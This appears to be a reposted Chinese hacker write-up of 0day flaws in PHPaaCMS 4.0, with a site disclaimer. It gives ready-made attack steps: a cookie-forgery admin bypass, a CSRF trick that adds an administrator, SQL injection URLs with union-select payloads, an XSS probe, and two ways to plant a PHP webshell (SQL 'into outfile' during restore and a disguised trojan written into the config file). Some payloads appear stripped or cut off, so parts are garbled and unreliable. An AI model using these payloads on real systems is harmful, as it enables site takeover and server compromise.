PHPaaCMS 4.0 oday - 技术文章

admin
admin
admin
138991
文章
114
评论
2021年4月3日19:40:30评论105 views字数 1538阅读5分7秒阅读模式

PHPaaCMS 4.0 oday
作者 菲哥哥
Blog http://hi.baidu.com/feihacker/

1. Cookie欺骗:
  形成原因:
  只判断Cookie不为空就能登录到后台
   if (!isset($_COOKIE['userid']) || empty($_COOKIE['userid'])){
      //如果没有设置userid   或者 userid  为空
        setcookie(lastURL,get_url());//上次访问地址
        header(“Location: login.php”);//跳转到登录页面 }
  测试:
    javascript:alert(document.cookie="userid=1")为Cookie赋值
    然后直接访问后台就可以登录了

2. CSRF
  形成原因:
    前台留言版支持html.  后台添加管理的时候对提交信息的来源判断不到
    位,可以添加验证码来防止CSRF,判断referer
  测试
    在添加管理员时抓包,构造好一个添加管理员的HTML页面上传到远程服
    务器,然后在留言版以添加管理员测试
    样的形式添加到留言当中,当管理员点击链接的时候就会添加一个管理员
       CSRF Exp
  

Exp PHPpaCMS CSRF 菲哥哥 or 菲





3. 注入:
  形成原因:
  对参数过滤不到位直接带入SQL语句造成的
  漏洞页面  
     admin/page.add.php  
     admin/ message.action.php
     admin/article.add.php
     search.php
      $userid = trim($_GET [‘userid’])?trim($_GET [‘userid’]):0;//只过滤了空格
      find ( "select * from phpaadb_users where userid=" . $userid );
       以上3个页面均是对userid 过滤不严造成的
  测试:
    http://localhost/phpaaCMS/admin/friendlink.add.php?act=edit&id=1%20and%201=2%20union%20select%201,2,3,user%28%29,5,6
    http://localhost/phpaaCMS/admin/user.add.php?act=edit,&userid=31 union select 1,user(),3
    http://localhost/phpaaCMS/admin/article.add.php?act=add&cid=1&id=32%27

4. XSS
  形成原因:
    对进行搜索时输入的html标签过滤不到
    漏洞页面  search.php 
  测试
         http://localhost/phpaacms/search.php?keywords=>">

5. 后台执行恢复数据可以写一句话:
  形成原因: 
    恢复数据的时候可以自定义SQL语句造成的.
  测试:
     在自己的SQL 脚本中写入如下代码
     select  * from hacker union select '1' from mysql.user into
     outfile 'D:wwwhack.php‘
     在执行恢复的时候可以生成一句话木马

6. 配置文件写一句话
  形成原因:
     把网站配置信息写到website.inc.php文件中过滤不到位造成的
  测试
     直接写常规的php木马是不行得,
         /“)?>      好闭合,在写网站配置信息的时候在管理员邮箱写上面的变形木马就
     可以了

文章来源于lcx.cc:PHPaaCMS 4.0 oday - 技术文章

相关推荐: Linode 被 Hack 事件始末

TL; DR 版本:Linode 是躺著中槍的路人 上個月,Linode 被打下來,洩漏了一堆資訊。逼得很多人不得不換卡和換密碼。幾個小時前,在 HackerNews 的一篇文章揭露 Linode 其實是路邊的那個倒楣鬼,人家不是要揍他,而是揍他的客戶… 以下…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:40:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHPaaCMS 4.0 oday - 技术文章https://cn-sec.com/archives/324315.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息